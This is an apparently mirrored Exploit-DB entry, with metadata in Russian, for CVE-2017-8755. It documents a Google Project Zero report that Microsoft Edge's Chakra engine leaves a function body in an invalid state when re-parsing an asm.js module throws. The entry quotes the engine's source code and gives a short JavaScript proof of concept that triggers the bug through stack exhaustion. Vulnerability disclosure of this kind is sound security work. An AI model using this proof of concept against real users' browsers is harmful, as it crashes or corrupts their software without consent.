- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 42766
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2017-8755
- Дата публикации
- 2017-09-21
Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1327
Here's the method used to re-parse asmjs modules.
void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
{
ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
Assert(functionInfo);
functionInfo->GetFunctionBody()->AddDeferParseAttribute();
functionInfo->GetFunctionBody()->ResetEntryPoint();
functionInfo->GetFunctionBody()->ResetInParams();
FunctionBody * funcBody = functionInfo->Parse(functionRef);
#if ENABLE_PROFILE_INFO
// This is the first call to the function, ensure dynamic profile info
funcBody->EnsureDynamicProfileInfo();
#endif
(*functionRef)->UpdateUndeferredBody(funcBody);
}
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. So in the case, the function body remains reseted(invalid).
We can make it throw an exception simply by exhausting the stack.
PoC:
-->
function Module() {
'use asm';
function f() {
}
return f;
}
function recur() {
try {
recur();
} catch (e) {
Module(1);
}
}
recur();- Источник
- www.exploit-db.com
